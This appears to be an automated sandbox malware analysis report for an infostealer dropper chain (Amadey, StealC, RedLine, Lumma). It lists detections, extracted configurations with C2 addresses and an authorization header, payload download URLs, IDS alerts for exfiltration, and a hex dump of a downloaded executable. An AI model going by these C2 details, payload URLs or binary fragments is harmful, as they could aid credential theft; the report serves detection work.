                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749795194.116.215.19580TCP
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749807185.215.113.2680TCP
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749867185.215.113.1680TCP
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749715185.215.113.10380TCP
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749789194.116.215.19580TCP
                                    2024-09-24T15:34:11.084631+020028033053Unknown Traffic192.168.2.749710185.215.113.10380TCP
                                    2024-09-24T15:34:30.815003+020028033053Unknown Traffic192.168.2.749718185.215.113.10380TCP
                                    2024-09-24T15:34:40.905391+020028033053Unknown Traffic192.168.2.749723185.215.113.1680TCP
                                    2024-09-24T15:35:03.919633+020028033053Unknown Traffic192.168.2.749754185.215.113.11780TCP
                                    2024-09-24T15:36:04.408707+020028033053Unknown Traffic192.168.2.749830185.215.113.1680TCP
                                    2024-09-24T15:36:19.023473+020028033053Unknown Traffic192.168.2.749842185.215.113.11780TCP
                                    2024-09-24T15:36:55.507285+020028033053Unknown Traffic192.168.2.749875185.215.113.1680TCP
                                    2024-09-24T15:37:02.723115+020028033053Unknown Traffic192.168.2.749880185.215.113.1680TCP
                                    2024-09-24T15:37:05.586889+020028033053Unknown Traffic192.168.2.749883185.215.113.1680TCP
                                    2024-09-24T15:37:08.692181+020028033053Unknown Traffic192.168.2.749889185.215.113.1680TCP
                                    2024-09-24T15:37:12.153269+020028033053Unknown Traffic192.168.2.749894185.215.113.11780TCP
                                    2024-09-24T15:37:15.169633+020028033053Unknown Traffic192.168.2.749899185.215.113.10080TCP
                                    2024-09-24T15:37:19.102576+020028033053Unknown Traffic192.168.2.749903185.215.113.11780TCP
                                    2024-09-24T15:37:22.357190+020028033053Unknown Traffic192.168.2.749908147.45.44.10480TCP
                                    2024-09-24T15:37:34.841271+020028033053Unknown Traffic192.168.2.749915103.130.147.21180TCP
                                    2024-09-24T15:37:43.325000+020028033053Unknown Traffic192.168.2.749921185.215.113.1680TCP
                                    2024-09-24T15:37:46.932327+020028033053Unknown Traffic192.168.2.74992546.19.218.204443TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: file.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://185.215.113.37/XAvira URL Cloud: Label: malware
                                    Source: http://185.215.113.37/OAvira URL Cloud: Label: malware
                                    Source: http://147.45.44.104/malesa/66ed86be077bb_12.exe01Avira URL Cloud: Label: malware
                                    Source: http://185.215.113.37/HAvira URL Cloud: Label: malware
                                    Source: http://185.215.113.37/e2b1563c6670f193.phpkAvira URL Cloud: Label: malware
                                    Source: http://103.130.147.211/Files/2.exeAvira URL Cloud: Label: malware
                                    Source: http://185.215.113.117/inc/gold.exeAvira URL Cloud: Label: malware
                                    Source: http://185.215.113.37/ataAvira URL Cloud: Label: malware
                                    Source: http://185.215.113.100/steam/random.exeAvira URL Cloud: Label: malware
                                    Source: http://185.215.113.16/dobre/splwow64.exeAvira URL Cloud: Label: phishing
                                    Source: http://194.116.215.195/12dsvc.exeAvira URL Cloud: Label: malware
                                    Source: http://185.215.113.16/inc/2.exeAvira URL Cloud: Label: phishing
                                    Source: http://185.215.113.37/Avira URL Cloud: Label: malware
                                    Source: http://185.215.113.26/Nework.exeAvira URL Cloud: Label: malware
                                    Source: http://185.215.113.16/Jo89Ku7d/index.php1KAvira URL Cloud: Label: phishing
                                    Source: http://185.215.113.37/tSwfAvira URL Cloud: Label: malware
                                    Source: http://185.215.113.37/e2b1563c6670f193.phpWindowsAvira URL Cloud: Label: malware
                                    Source: http://185.215.113.16/inc/penis.exeAvira URL Cloud: Label: phishing
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exeAvira: detection malicious, Label: TR/Drop.Agent.fgswh
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\gold[1].exeAvira: detection malicious, Label: HEUR/AGEN.1351932
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exeAvira: detection malicious, Label: HEUR/AGEN.1357677
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exeAvira: detection malicious, Label: HEUR/AGEN.1316118
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exeAvira: detection malicious, Label: TR/Spy.RedLine.ouvlp
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeAvira: detection malicious, Label: TR/AD.Stealc.pegov
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exeAvira: detection malicious, Label: TR/Spy.Agent.bvpeh
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeAvira: detection malicious, Label: HEUR/AGEN.1351932
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Blenar[1].exeAvira: detection malicious, Label: HEUR/AGEN.1312961
                                    Found malware configuration
                                    Source: 00000006.00000002.1318437657.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                                    Source: 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "95.179.250.45:26212", "Bot Id": "LiveTraffic", "Message": "Error! Disable antivirus and try again!", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
                                    Source: 15.2.3ec4738210.exe.200000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exeReversingLabs: Detection: 87%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\gold[1].exeReversingLabs: Detection: 100%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exeReversingLabs: Detection: 87%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exeReversingLabs: Detection: 69%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeReversingLabs: Detection: 76%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\2[1].exeReversingLabs: Detection: 60%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exeReversingLabs: Detection: 70%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exeReversingLabs: Detection: 91%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exeReversingLabs: Detection: 57%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exeReversingLabs: Detection: 83%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exeReversingLabs: Detection: 60%
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeReversingLabs: Detection: 100%
                                    Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeReversingLabs: Detection: 76%
                                    Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exeReversingLabs: Detection: 87%
                                    Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exeReversingLabs: Detection: 69%
                                    Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exeReversingLabs: Detection: 60%
                                    Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exeReversingLabs: Detection: 57%
                                    Source: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exeReversingLabs: Detection: 70%
                                    Source: C:\Users\user\AppData\Local\Temp\1000321001\2.exeReversingLabs: Detection: 60%
                                    Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeReversingLabs: Detection: 87%
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 47%
                                    Multi AV Scanner detection for submitted file
                                    Source: file.exeReversingLabs: Detection: 47%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[2].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: file.exeJoe Sandbox ML: detected
                                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: unknownHTTPS traffic detected: 46.19.218.204:443 -> 192.168.2.7:49925 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 46.19.218.204:443 -> 192.168.2.7:49931 version: TLS 1.2
                                    Source: Binary string: .pdb8 source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: rolsroice.pdb source: 66ed86be077bb_12.exe.27.dr
                                    Source: Binary string: rolsroice.pdbX source: 66ed86be077bb_12.exe.27.dr
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E2C2A2 FindFirstFileExW,17_2_00E2C2A2
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E668EE FindFirstFileW,FindClose,17_2_00E668EE
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,17_2_00E6698F
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00E5D076
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00E5D3A9
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00E69642
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00E6979D
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,17_2_00E5DBBE
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,17_2_00E69B2B
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E65C97 FindFirstFileW,FindNextFileW,FindClose,17_2_00E65C97
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: C:\Users\user
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: C:\Users\user\AppData\Local
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: C:\Users\user\AppData
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: C:\Users\user\Desktop\desktop.ini

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.7:49709
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49713 -> 185.215.113.43:80
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49711 -> 185.215.113.43:80
                                    Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49744 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.7:49744
                                    Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49801 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49793 -> 185.215.113.37:80
                                    Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49830 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49821 -> 95.179.250.45:26212
                                    Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49821 -> 95.179.250.45:26212
                                    Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 95.179.250.45:26212 -> 192.168.2.7:49821
                                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49828 -> 185.215.113.37:80
                                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 95.179.250.45:26212 -> 192.168.2.7:49821
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49836 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49840 -> 185.215.113.37:80
                                    Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49866 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49879 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.7:49883 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49887 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49892 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:63385 -> 1.1.1.1:53
                                    Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49898 -> 89.105.223.196:29862
                                    Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49898 -> 89.105.223.196:29862
                                    Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 89.105.223.196:29862 -> 192.168.2.7:49898
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49897 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:50747 -> 1.1.1.1:53
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49902 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49907 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 89.105.223.196:29862 -> 192.168.2.7:49898
                                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49904 -> 185.215.113.37:80
                                    Source: Network trafficSuricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:55279 -> 1.1.1.1:53
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49882 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49913 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:61394 -> 1.1.1.1:53
                                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49914 -> 185.215.113.37:80
                                    Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.7:49915 -> 103.130.147.211:80
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49920 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:53927 -> 1.1.1.1:53
                                    Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49924 -> 185.215.113.67:15206
                                    Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49924 -> 185.215.113.67:15206
                                    Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.215.113.67:15206 -> 192.168.2.7:49924
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49923 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.215.113.67:15206 -> 192.168.2.7:49924
                                    Source: Network trafficSuricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:64065 -> 1.1.1.1:53
                                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49927 -> 185.215.113.37:80
                                    Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49929 -> 185.244.181.140:80
                                    Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49932 -> 185.244.181.140:80
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49833 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49758 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49766 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49730 -> 185.215.113.43:80
                                    Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49825 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49852 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49855 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49819 -> 185.215.113.16:80
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49719 -> 185.215.113.43:80
                                    Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49717 -> 185.215.113.43:80
                                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49762 -> 185.215.113.16:80
                                    C2 URLs / IPs found in malware configuration
                                    Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                                    Source: Malware configuration extractorIPs: 185.215.113.43
                                    Source: Malware configuration extractorURLs: 95.179.250.45:26212
                                    Source: global trafficTCP traffic: 192.168.2.7:49760 -> 95.179.250.45:26212
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:34:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 24 Sep 2024 12:56:26 GMTETag: "1c0200-622dd088a9fca"Accept-Ranges: bytesContent-Length: 1835520Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 70 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 36 44 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 63 6f 72 7a 68 61 6f 00 a0 19 00 00 c0 4f 00 00 9e 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6b 78 66 65 61 63 64 00 10 00 00 00 60 69 00 00 06 00 00 00 da 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 e0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 